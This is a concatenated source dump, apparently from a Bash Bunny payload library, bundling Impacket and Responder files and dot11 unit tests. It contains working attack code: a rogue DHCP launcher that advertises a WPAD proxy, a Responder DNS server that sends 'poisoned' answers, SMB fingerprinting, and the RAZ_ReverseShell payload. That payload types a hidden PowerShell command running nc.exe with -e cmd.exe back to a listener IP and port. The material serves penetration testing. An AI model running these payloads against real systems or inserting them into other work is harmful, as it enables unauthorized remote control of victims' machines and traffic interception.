$INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'` 42 | DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'` 43 | DNS1=$IPADDR 44 | DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'` 45 | ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'` 46 | WPADSTR="http://$IPADDR/wpad.dat" 47 | if [ -z "$DOMAIN" ]; then 48 | DOMAIN=" " 49 | fi 50 | 51 | echo "Running with parameters:" 52 | echo "INTERFACE: $INTF" 53 | echo "IP ADDR: $IPADDR" 54 | echo "NETMAST: $NETMASK" 55 | echo "ROUTER IP: $ROUTER" 56 | echo "DNS1 IP: $DNS1" 57 | echo "DNS2 IP: $DNS2" 58 | echo "WPAD: $WPADSTR" 59 | echo "" 60 | 61 | 62 | echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 63 | python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/loopchain.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time 4 | 5 | from impacket.examples import logger 6 | from impacket import smb 7 | 8 | 9 | class lotsSMB(smb.SMB): 10 | def loop_write_andx(self,tid,fid,data, offset = 0, wait_answer=1): 11 | pkt = smb.NewSMBPacket() 12 | pkt['Flags1'] = 0x18 13 | pkt['Flags2'] = 0 14 | pkt['Tid'] = tid 15 | 16 | writeAndX = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 17 | pkt.addCommand(writeAndX) 18 | 19 | writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() 20 | writeAndX['Parameters']['Fid'] = fid 21 | writeAndX['Parameters']['Offset'] = offset 22 | writeAndX['Parameters']['WriteMode'] = 0 23 | writeAndX['Parameters']['Remaining'] = len(data) 24 | writeAndX['Parameters']['DataLength'] = len(data) 25 | writeAndX['Parameters']['DataOffset'] = len(pkt) 26 | writeAndX['Data'] = data+('A'*4000) 27 | 28 | saved_offset = len(pkt) 29 | 30 | writeAndX2 = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 31 | pkt.addCommand(writeAndX2) 32 | 33 | writeAndX2['Parameters'] = smb.SMBWriteAndX_Parameters() 34 | writeAndX2['Parameters']['Fid'] = fid 35 | writeAndX2['Parameters']['Offset'] = offset 36 | writeAndX2['Parameters']['WriteMode'] = 0 37 | writeAndX2['Parameters']['Remaining'] = len(data) 38 | writeAndX2['Parameters']['DataLength'] = len(data) 39 | writeAndX2['Parameters']['DataOffset'] = len(pkt) 40 | writeAndX2['Data'] = '\n' 41 | 42 | writeAndX2['Parameters']['AndXCommand'] = self.SMB_COM_WRITE_ANDX 43 | writeAndX2['Parameters']['AndXOffset'] = saved_offset 44 | 45 | self.sendSMB(pkt) 46 | 47 | if wait_answer: 48 | pkt = self.recvSMB() 49 | if pkt.isValidAnswer(self.SMB_COM_WRITE_ANDX): 50 | return pkt 51 | return None 52 | 53 | # Init the example's logger theme 54 | logger.init() 55 | s = lotsSMB('*SMBSERVER','192.168.1.1') 56 | s.login('Administrator','pasword') 57 | tid = s.tree_connect(r'\\*SMBSERVER\IPC$') 58 | fid = s.open_andx(tid, r'\pipe\echo', smb.SMB_O_CREAT, smb.SMB_O_OPEN)[0] 59 | 60 | s.loop_write_andx(tid,fid,'<1234>\n', wait_answer = 0) 61 | 62 | time.sleep(2) 63 | s.close(tid,fid) 64 | 65 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple packet sniffer. 9 | # 10 | # This packet sniffer uses a raw socket to listen for packets 11 | # in transit corresponding to the specified protocols. 12 | # 13 | # Note that the user might need special permissions to be able to use 14 | # raw sockets. 15 | # 16 | # Authors: 17 | # Gerardo Richarte 18 | # Javier Kohen 19 | # 20 | # Reference for: 21 | # ImpactDecoder. 22 | 23 | from select import select 24 | import socket 25 | import sys 26 | 27 | from impacket import ImpactDecoder 28 | 29 | DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp') 30 | 31 | if len(sys.argv) == 1: 32 | toListen = DEFAULT_PROTOCOLS 33 | print "Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0] 34 | else: 35 | toListen = sys.argv[1:] 36 | 37 | # Open one socket for each specified protocol. 38 | # A special option is set on the socket so that IP headers are included with 39 | # the returned data. 40 | sockets = [] 41 | for protocol in toListen: 42 | try: 43 | protocol_num = socket.getprotobyname(protocol) 44 | except socket.error: 45 | print "Ignoring unknown protocol:", protocol 46 | toListen.remove(protocol) 47 | continue 48 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num) 49 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 50 | sockets.append(s) 51 | 52 | if 0 == len(toListen): 53 | print "There are no protocols available." 54 | sys.exit(0) 55 | 56 | print "Listening on protocols:", toListen 57 | 58 | # Instantiate an IP packets decoder. 59 | # As all the packets include their IP header, that decoder only is enough. 60 | decoder = ImpactDecoder.IPDecoder() 61 | 62 | while len(sockets) > 0: 63 | # Wait for an incoming packet on any socket. 64 | ready = select(sockets, [], [])[0] 65 | for s in ready: 66 | packet = s.recvfrom(4096)[0] 67 | if 0 == len(packet): 68 | # Socket remotely closed. Discard it. 69 | sockets.remove(s) 70 | s.close() 71 | else: 72 | # Packet received. Decode and display it. 73 | packet = decoder.decode(packet) 74 | print packet 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import socket 18 | import struct 19 | 20 | from utils import color 21 | from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData 22 | 23 | def OsNameClientVersion(data): 24 | try: 25 | length = struct.unpack('i", len(''.join(Packet)))+Packet 44 | s.send(Buffer) 45 | data = s.recv(2048) 46 | 47 | if data[8:10] == "\x72\x00": 48 | Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") 49 | Body = SMBSessionFingerData() 50 | Body.calculate() 51 | 52 | Packet = str(Header)+str(Body) 53 | Buffer = struct.pack(">i", len(''.join(Packet)))+Packet 54 | 55 | s.send(Buffer) 56 | data = s.recv(2048) 57 | 58 | if data[8:10] == "\x73\x16": 59 | return OsNameClientVersion(data) 60 | except: 61 | print color("[!] ", 1, 1) +" Fingerprint failed" 62 | return None 63 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/install.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Based on bashbunnypayloads installer 3 | # https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/tools_installer/install.sh 4 | 5 | # Check Switch Position 6 | source bunny_helpers.sh 7 | 8 | TARGET_DIR='/root/tools' 9 | RELEASE_ARCHIVE=$(find /root/udisk/payloads/${SWITCH_POSITION} -name DuckToolkit-*) 10 | 11 | echo "Install Log:" > /tmp/duck_installer.log 12 | echo "----------------" >> /tmp/duck_installer.log 13 | 14 | if [ -f ${RELEASE_ARCHIVE} ]; then 15 | echo "Found ${RELEASE_ARCHIVE}" >> /tmp/duck_installer.log 16 | else 17 | LED R 18 | echo "No ducktoolkit release found" >> /tmp/duck_installer.log 19 | exit 1 20 | fi 21 | 22 | # Set LED to purple blinking and move files 23 | LED R B 100 24 | 25 | # Backup Existing library 26 | if [ -d "$TARGET_DIR/DuckToolkit" ]; then 27 | echo "Library Exists; removing" >> /tmp/duck_installer.log 28 | rm -rf ${TARGET_DIR}/DuckToolkit 29 | fi 30 | 31 | echo "Copying files to target dir" >> /tmp/duck_installer.log 32 | cp ${RELEASE_ARCHIVE} ${TARGET_DIR} 33 | cd ${TARGET_DIR} 34 | tar zxf DuckToolkit-* && mv $(find . -name "DuckToolkit-*" ! -name "*.gz") DuckToolkit && rm DuckToolkit*.tar.gz 35 | 36 | echo "Move Complete" >> /tmp/duck_installer.log 37 | 38 | # Set LED to purple solid and check that move completed 39 | LED R B 40 | if ! [ -d "${TARGET_DIR}/DuckToolkit" ]; then 41 | # Set LED to red on fail and exit 42 | LED R 43 | echo "Failed to copy files to target dir" >> /tmp/duck_installer.log 44 | exit 1 45 | else 46 | # Set LED to amber blinking on setup 47 | LED G R 100 48 | # Set calling script executable 49 | chmod +x ${TARGET_DIR}/DuckToolkit/bunnyducky.py 50 | 51 | # Update Q and QUACK to use the new library 52 | echo "Update Q" >> /tmp/duck_installer.log 53 | cat <<'EOF' > /root/Q 54 | #!/bin/sh 55 | # Input parameters; 56 | strparam="$@" 57 | /root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt 58 | exit 0 59 | EOF 60 | 61 | echo "Update QUACK" >> /tmp/duck_installer.log 62 | cat <<'EOF' > /root/QUACK 63 | #!/bin/sh 64 | # Input parameters; 65 | strparam="$@" 66 | /root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt 67 | exit 0 68 | EOF 69 | 70 | # LED To green for complete 71 | LED R G B 72 | 73 | fi 74 | cp /tmp/duck_installer.log /root/udisk/payloads/${SWITCH_POSITION}/install_log.txt 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlRTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameRTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlRTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame RTS 15 | self.frame_orig='\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND) 27 | 28 | self.rts = Dot11ControlFrameRTS(d.get_body_as_string()) 29 | 30 | d.contains(self.rts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.rts.get_header_size(), 14) 35 | self.assertEqual(self.rts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.rts.get_duration(), 0x181) 41 | self.rts.set_duration(0x1234) 42 | self.assertEqual(self.rts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.rts.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.rts.set_ra(ra) 52 | self.assertEqual(self.rts.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.rts.get_ta() 58 | self.assertEqual(ta.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.rts.set_ta(ta) 62 | self.assertEqual(self.rts.get_ta().tolist(), [0x12,0x23,0x4d,0x09,0x86,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlRTS) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEnd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEnd(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEnd 15 | self.frame_orig='\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END) 27 | 28 | self.cfend = Dot11ControlFrameCFEnd(d.get_body_as_string()) 29 | 30 | d.contains(self.cfend) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfend.get_header_size(), 14) 35 | self.assertEqual(self.cfend.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfend.get_duration(), 0x00) 41 | self.cfend.set_duration(0x1234) 42 | self.assertEqual(self.cfend.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfend.get_ra() 48 | self.assertEqual(ra.tolist(), [0xff,0xff,0xff,0xff,0xff,0xff]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfend.set_ra(ra) 52 | self.assertEqual(self.cfend.get_ra().tolist(), [0x12,0xff,0xff,0xff,0xff,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfend.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfend.set_bssid(bssid) 62 | self.assertEqual(self.cfend.get_bssid().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEnd) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSMB2UPTime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sys 18 | import os 19 | import datetime 20 | import struct 21 | import socket 22 | 23 | sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))) 24 | from packets import SMB2Header, SMB2Nego, SMB2NegoData 25 | 26 | def GetBootTime(data): 27 | Filetime = int(struct.unpack('i", len(Packet)) + Packet 52 | s.send(Buffer) 53 | 54 | try: 55 | data = s.recv(1024) 56 | if data[4:5] == "\xff": 57 | print "This host doesn't support SMBv2" 58 | if data[4:5] == "\xfe": 59 | IsDCVuln(GetBootTime(data[116:124])) 60 | except Exception: 61 | s.close() 62 | raise 63 | 64 | if __name__ == "__main__": 65 | if len(sys.argv)<=1: 66 | sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address') 67 | host = sys.argv[1],445 68 | run(host) 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlPSPoll.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlPSPoll(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame PSPoll 15 | self.frame_orig='\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL) 27 | 28 | self.pspoll = Dot11ControlFramePSPoll(d.get_body_as_string()) 29 | 30 | d.contains(self.pspoll) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.pspoll.get_header_size(), 14) 35 | self.assertEqual(self.pspoll.get_tail_size(), 0) 36 | 37 | def test_02_AID(self): 38 | 'Test AID field' 39 | 40 | self.assertEqual(self.pspoll.get_aid(), 0xAFF1) 41 | self.pspoll.set_aid(0x1234) 42 | self.assertEqual(self.pspoll.get_aid(), 0x1234) 43 | 44 | def test_03_BSSID(self): 45 | 'Test BSS ID field' 46 | 47 | bssid=self.pspoll.get_bssid() 48 | self.assertEqual(bssid.tolist(), [0x48,0x06,0xee,0x23,0x2b,0xc9]) 49 | bssid[0]=0x12 50 | bssid[5]=0x34 51 | self.pspoll.set_bssid(bssid) 52 | self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12,0x06,0xee,0x23,0x2b,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.pspoll.get_ta() 58 | self.assertEqual(ta.tolist(), [0xfe,0xbe,0xe5,0x05,0x4c,0x0a]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.pspoll.set_ta(ta) 62 | self.assertEqual(self.pspoll.get_ta().tolist(), [0x12,0xbe,0xe5,0x05,0x4c,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlPSPoll) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/rawreg.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | from framework.newobj import Obj,Pointer 23 | from struct import unpack 24 | 25 | ROOT_INDEX = 0x20 26 | LH_SIG = unpack(". 17 | from packets import DNS_Ans 18 | from SocketServer import BaseRequestHandler 19 | from utils import * 20 | 21 | def ParseDNSType(data): 22 | QueryTypeClass = data[len(data)-4:] 23 | 24 | # If Type A, Class IN, then answer. 25 | return QueryTypeClass == "\x00\x01\x00\x01" 26 | 27 | 28 | 29 | class DNS(BaseRequestHandler): 30 | def handle(self): 31 | # Break out if we don't want to respond to this host 32 | if RespondToThisIP(self.client_address[0]) is not True: 33 | return None 34 | 35 | try: 36 | data, soc = self.request 37 | 38 | if ParseDNSType(data) and settings.Config.AnalyzeMode == False: 39 | buff = DNS_Ans() 40 | buff.calculate(data) 41 | soc.sendto(str(buff), self.client_address) 42 | 43 | ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 44 | print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 45 | 46 | except Exception: 47 | pass 48 | 49 | # DNS Server TCP Class 50 | class DNSTCP(BaseRequestHandler): 51 | def handle(self): 52 | # Break out if we don't want to respond to this host 53 | if RespondToThisIP(self.client_address[0]) is not True: 54 | return None 55 | 56 | try: 57 | data = self.request.recv(1024) 58 | 59 | if ParseDNSType(data) and settings.Config.AnalyzeMode is False: 60 | buff = DNS_Ans() 61 | buff.calculate(data) 62 | self.request.send(str(buff)) 63 | 64 | ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 65 | print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 66 | 67 | except Exception: 68 | pass 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEndCFACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEndCFACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEndCFACK 15 | self.frame_orig='\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK) 27 | 28 | self.cfendcfack = Dot11ControlFrameCFEndCFACK(d.get_body_as_string()) 29 | 30 | d.contains(self.cfendcfack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfendcfack.get_header_size(), 14) 35 | self.assertEqual(self.cfendcfack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE) 41 | self.cfendcfack.set_duration(0x1234) 42 | self.assertEqual(self.cfendcfack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfendcfack.get_ra() 48 | self.assertEqual(ra.tolist(), [0xe5,0x56,0x85,0xf8,0xd2,0x3b]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfendcfack.set_ra(ra) 52 | self.assertEqual(self.cfendcfack.get_ra().tolist(), [0x12,0x56,0x85,0xf8,0xd2,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfendcfack.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x96,0xae,0x0f,0xb0,0xd9,0x8a]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfendcfack.set_bssid(bssid) 62 | self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12,0xae,0x0f,0xb0,0xd9,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEndCFACK) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: RAZ_ReverseShell 4 | # Author: RalphyZ 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # Dependencies: The following files must exist in the switch folder: 8 | # nc.exe - Windows binary for netcat with the -e flag 9 | # listener_port.txt - The Port number for the netcat listener 10 | # listener_ip.txt - The IP Address for the netcat listener 11 | # 12 | # Description: Executes a netcat reverse cmd shell at a given IP and Port 13 | # Intentionally, this script leaves a trace in the Run Box 14 | # 15 | # Colors: 16 | # Green.....................Working 17 | # White.....................Completed without error 18 | # White (blinking)..........Incrementing the port in listener_port.txt 19 | # Blue (blinking)...........listener_port.txt was not found 20 | # Light-Blue (blinking).....listener_ip.txt was not found 21 | # Amber (blinking)..........nc.exe was not found 22 | 23 | 24 | # Change this if you want to enable auto_increment of the netcat port 25 | # If true, the port number is increased by 1 everytime the script runs 26 | # This is good for Red Teams doing PenTesting on multiple computers 27 | auto_increment=false 28 | 29 | LED G 30 | ATTACKMODE HID STORAGE 31 | 32 | LANGUAGE='us' 33 | 34 | # Get the switch position 35 | source bunny_helpers.sh 36 | 37 | 38 | # Check for all the files - error if not found. If found, put into variables 39 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then 40 | LED B 100 41 | exit 1 42 | else 43 | my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` 44 | fi 45 | 46 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then 47 | LED B G 100 48 | exit 1 49 | else 50 | my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` 51 | fi 52 | 53 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then 54 | LED R G 100 55 | exit 1 56 | fi 57 | 58 | # Execute the powershell command in the run box with the appropriate variables 59 | QUACK GUI r 60 | QUACK DELAY 100 61 | QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" 62 | QUACK ENTER 63 | 64 | # If auto_increment, then update the listener_port file 65 | if [ "$auto_increment" = true ] ; then 66 | LED R G B 100 67 | echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt 68 | 69 | # Allow the write to sync to the USB 70 | sleep 1 71 | fi 72 | 73 | # Signal everything went OK - white 74 | LED R G B 75 | exit 0 76 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/ping6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple ICMP6 ping. 9 | # 10 | # This implementation of ping uses the ICMP echo and echo-reply packets 11 | # to check the status of a host. If the remote host is up, it should reply 12 | # to the echo probe with an echo-reply packet. 13 | # Note that this isn't a definite test, as in the case the remote host is up 14 | # but refuses to reply the probes. 15 | # Also note that the user must have special access to be able to open a raw 16 | # socket, which this program requires. 17 | # 18 | # Authors: 19 | # Alberto Solino (@agsolino) 20 | # 21 | # Reference for: 22 | # ImpactPacket: ICMP6 23 | # ImpactDecoder. 24 | 25 | import select 26 | import socket 27 | import time 28 | import sys 29 | 30 | from impacket import ImpactDecoder, ImpactPacket, IP6, ICMP6, version 31 | 32 | print version.BANNER 33 | 34 | if len(sys.argv) < 3: 35 | print "Use: %s " % sys.argv[0] 36 | sys.exit(1) 37 | 38 | src = sys.argv[1] 39 | dst = sys.argv[2] 40 | 41 | # Create a new IP packet and set its source and destination addresses. 42 | 43 | ip = IP6.IP6() 44 | ip.set_ip_src(src) 45 | ip.set_ip_dst(dst) 46 | ip.set_traffic_class(0) 47 | ip.set_flow_label(0) 48 | ip.set_hop_limit(64) 49 | 50 | # Open a raw socket. Special permissions are usually required. 51 | s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6) 52 | 53 | payload = "A"*156 54 | 55 | print "PING %s %d data bytes" % (dst, len(payload)) 56 | seq_id = 0 